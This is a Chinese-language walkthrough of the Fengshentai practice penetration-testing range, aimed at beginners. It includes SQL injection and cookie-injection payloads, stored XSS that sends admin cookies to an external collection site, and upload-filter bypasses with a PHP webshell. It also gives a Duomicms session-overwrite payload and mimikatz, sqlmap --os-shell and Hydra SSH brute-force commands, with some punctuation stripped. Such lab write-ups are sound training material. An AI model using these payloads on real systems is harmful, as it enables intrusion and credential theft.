为掌控安全旗下最具代表性的入门级渗透靶场封神台凭借剧情化的关卡设计、循序渐进的难度曲线以及完全免费的在线环境成为无数网络安全初学者的入门首选。其中「尤里的复仇」三部曲与「Kali 渗透系列」两大主线覆盖了从基础 Web 漏洞到实战渗透的完整知识体系。本文将系统梳理封神台全部主流靶场的通关思路与核心 Payload从 SQL 注入到提权、从信息收集到服务爆破帮你建立完整的渗透测试思维链路。合规提示本文所有技术仅用于授权靶场练习与学习严禁对未授权的真实网站或服务器实施攻击遵守《网络安全法》与职业道德。一、靶场体系总览封神台的核心靶场分为两大系列难度由浅入深表格系列关卡数核心考点难度尤里的复仇 Ⅰ7 关SQL 注入、WAF 绕过、XSS、越权、文件上传、系统提权、密码抓取★★☆尤里的复仇 Ⅱ 回归7 关信息收集、目录扫描、SQL 注入绕过、Getshell、AWD 攻防、Fuzz★★★尤里的复仇 Ⅲ 进击的尤里3 关邮件钓鱼、线索溯源、CMS 变量覆盖漏洞、后台 GetShell★★★☆Kali 渗透系列4 关Sqlmap 实操、后台 GetShell、OS-Shell 提权、Hydra 服务爆破★★★二、尤里的复仇 Ⅰ小芳系列最经典入门篇这是封神台最知名的入门系列以完整的渗透链路著称从发现注入到拿到系统权限一气呵成。第一章为了女神小芳 —— 数字型 SQL 显注考点GET 型数字联合查询注入通关步骤进入新闻详情页?id1分别测试and 11与and 12页面返回差异确认数字型注入order by 2正常、order by 3报错确认字段数为 2构造联合查询id 设为负数使原查询失效plaintext?id-1 union select 1,group_concat(username,0x3a,password) from admin页面直接返回admin:hellohack密码即为 Flag第二章遇到阻难 —— Cookie 注入绕过 WAF考点WAF 防护机制缺陷 Cookie 注入核心思路WAF 仅过滤 URL 参数未校验 Cookie通关步骤URL 传参触发 WAF 拦截确认防护范围Burp 抓包删除 URL 中的 id 参数在 Cookie 字段添加id1页面正常返回在 Cookie 中执行注入plaintextCookie: id-1 union select 1,2 from admin逐步脱库获取管理员密码进入后台第三章为了更多权限 —— 存储型 XSS 窃 Cookie考点存储型 XSS 管理员 Cookie 窃取通关步骤留言板输入scriptalert(1)/script验证漏洞打开 XSS 在线平台xsshs.cn新建项目复制远程加载脚本将 Payload 提交到留言板等待管理员机器人访问XSS 平台收到 Cookie其中包含zkz{}格式的 Flag第四章进击 —— Cookie 垂直越权考点身份认证缺陷 垂直越权通关步骤复制上一关获取的管理员 CookieF12 开发者工具 → Application → Cookies替换当前页面 Cookie刷新页面直接绕过登录进入管理员后台第五章拿到 Web 最高权限 —— 文件上传漏洞考点黑名单过滤绕过 IIS 解析漏洞通关步骤后台头像上传点黑名单禁止 php 后缀按优先级尝试绕过大小写绕过shell.PhP后缀点绕过shell.php.IIS 解析shell.asp;.jpg或改为.cer后缀上传成功后用蚁剑连接在网站根目录找到 flag 文件第六章SYSTEM POWER —— 本地提权考点Windows 系统本地溢出提权通关步骤通过 Webshell 上传提权工具iis6.exe虚拟终端执行提权命令获取 SYSTEM 权限读取 C 盘根目录 flag.txt第七章GET THE PASS —— 明文密码抓取考点Mimikatz 抓取系统密码通关步骤上传 mimikatz.exe 到服务器依次执行plaintextprivilege::debug sekurlsa::logonPasswords获取管理员 NTLM 哈希解密后得到明文密码三、尤里的复仇 Ⅱ回归进阶实战篇第二部难度明显提升更注重信息收集能力与漏洞绕过思维共 7 个关卡。第一关归来 - 脚踏实地考点目录扫描 源码信息泄露通关思路使用御剑或 dirsearch 扫描网站目录重点扫描files/、install/等敏感目录在安装包或源码文件中找到默认账号密码或 Flag部分环境可通过robots.txt找到隐藏路径第二、三关渗透第一步 - 信息收集考点子域名探测 端口扫描 旁站信息搜集通关思路子域名爆破使用 layer 或子域名扫描工具发现同 IP 下的其他站点端口扫描nmap -sS -n -A 目标IP发现非标准端口的 Web 服务旁站查询通过同 IP 网站查询工具找到虚拟主机上的其他站点通常 Flag 藏在旁站的 robots.txt 或默认页面中第四关sqlmap 尝鲜题考点Sqlmap 基础使用通关思路找到注入点后使用 Sqlmap 自动化脱库基础命令bash运行sqlmap -u 目标URL?id1 --dbs sqlmap -u 目标URL?id1 -D 库名 --tables sqlmap -u 目标URL?id1 -D 库名 -T 表名 --dump找到 admin 表中的管理员密码MD5 解密后提交第五关SQL 注入绕过防护 Getshell考点SQL 注入关键字过滤绕过通关思路测试发现 and、union 等关键字被过滤使用双写绕过ununionion、selselectect或使用百分号拆分、内联注释绕过注入成功后利用--os-shell参数直接获取系统权限第六关AWD 攻防 - Fuzz 乱拳打死老师傅考点模糊测试 漏洞挖掘通关思路对目标站点进行全面目录 Fuzz测试各种输入点的 SQL 注入、XSS、命令执行漏洞重点关注备份文件、phpinfo、测试页面等信息泄露点找到可利用漏洞后获取 Flag第七关基础环境搭建考点CMS 识别 已知漏洞利用通关思路识别网站使用的 CMS 类型搜索对应 CMS 的已知漏洞利用公开 EXP 获取权限或 Flag四、尤里的复仇 Ⅲ进击的尤里高阶篇第三部剧情继续推进关卡数量不多但难度更高偏向真实渗透场景。第八章来自邹节伦的邮件考点邮件钓鱼分析 附件病毒分析通关思路分析邮件头信息追踪发件人 IP 与路径分析邮件附件中的恶意文档或脚本从恶意代码中提取隐藏的 Flag 或线索部分关卡需要逆向分析宏代码或脚本逻辑第九章发现线索考点信息溯源 线索关联通关思路根据上一关获取的线索继续深入搜索相关域名、IP、社交账号等信息通过开源情报OSINT收集更多目标信息找到下一关的入口地址或关键凭证第十章看你是否能进入后台考点Duomicms 变量覆盖漏洞 后台 GetShell通关思路御剑扫描后台路径找到登录入口识别 CMS 为 Duomicms利用其经典变量覆盖漏洞构造 Payload 直接伪造管理员 Sessionplaintextinterface/comment.php?_SESSION[duomi_admin_id]1_SESSION[duomi_admin_name]admin直接进入后台在模板编辑处写入一句话木马 GetShell五、Kali 渗透系列新靶场工具实战篇Kali 系列主打工具实操每一关对应一个经典渗透工具的使用共 4 关。第一关Sqlmap 实操靶场考点Sqlmap POST 注入 后台脱库通关步骤目录扫描发现/admin后台登录页Burp 抓登录包保存为 txt 文件Sqlmap 加载数据包跑注入bash运行sqlmap -r post.txt --batch --dbs找到 qcms 库中的 qcms_admin 表获取管理员密码哈希MD5 解密后得到 Flag避坑提示后台页面显示的 flag {sqlmappy1k} 是干扰项真正的 Flag 是管理员密码解密结果第二关拿下目标服务器考点后台 GetShell 蚁剑连接通关步骤用上一关获取的账号密码登录后台找到模板编辑或文件管理功能无严格过滤直接写入一句话木马?php eval($_POST[a]);?中国蚁剑连接在网站目录找到 flag.php第三关通过 Sqlmap 直接获得服务器权限考点Sqlmap --os-shell 直接拿系统权限通关步骤找到 SQL 注入点确认 DBA 权限使用 os-shell 参数直接获取交互式 Shellbash运行sqlmap -u 注入点URL --os-shell --batch进入 Shell 后查看根目录 flag.php 文件或通过 Sqlmap 上传一句话木马用蚁剑连接管理第四关Hydra 爆破服务器登陆密码考点Hydra 九头蛇工具 SSH 服务爆破通关步骤端口扫描确认目标开放 22 端口SSH 服务准备用户名字典与密码字典Kali 自带/usr/share/wordlists/使用 Hydra 爆破 SSH 登录bash运行hydra -L 用户字典.txt -P 密码字典.txt -t 5 -vV 目标IP ssh爆破成功后得到账号密码即为 Flag常用参数说明-l指定单个用户名-L指定用户名字典-p指定单个密码-P指定密码字典-t指定线程数-vV显示详细爆破过程-f找到第一个正确结果即停止六、萌新通用通关方法论信息收集万能流程遇到任何新靶场按以下顺序排查90% 的关卡都能找到突破口目录扫描御剑 /dirsearch 扫后台、备份、敏感文件端口扫描nmap 扫非标准端口服务CMS 识别确定建站程序搜索已知漏洞参数测试所有带参数的 URL 先测 SQL 注入输入框测试留言、搜索、登录框测 XSS 和注入上传功能直接测文件上传漏洞权限测试修改 Cookie、ID 参数测越权高频卡坑避坑指南SQL 注入无回显id 参数设为负数原查询失效后才能看到 union 结果WAF 拦截优先试 Cookie 注入、Referer 注入不要死磕 URLXSS 弹窗不算过必须用在线平台接收管理员 Cookie文件上传失败IIS 环境优先试.cer后缀比图片马成功率高URL 注释失效地址栏中#需转义为%23否则被浏览器截断工具跑不出结果降低线程、增加延时避免靶场封禁写在最后封神台靶场最大的价值不在于收集了多少个 Flag而在于通过剧情化的关卡设计让初学者建立起完整的渗透测试思维从信息收集到漏洞发现从利用绕过再到权限提升每一步都对应真实攻防场景中的标准动作。建议第一遍可以跟着教程通关熟悉流程第二遍尝试脱离教程手工注入、自主寻找漏洞真正吃透每一个漏洞的原理与利用方式。当你能不看教程完整打通尤里的复仇全系列时Web 安全的基础体系也就基本建立了。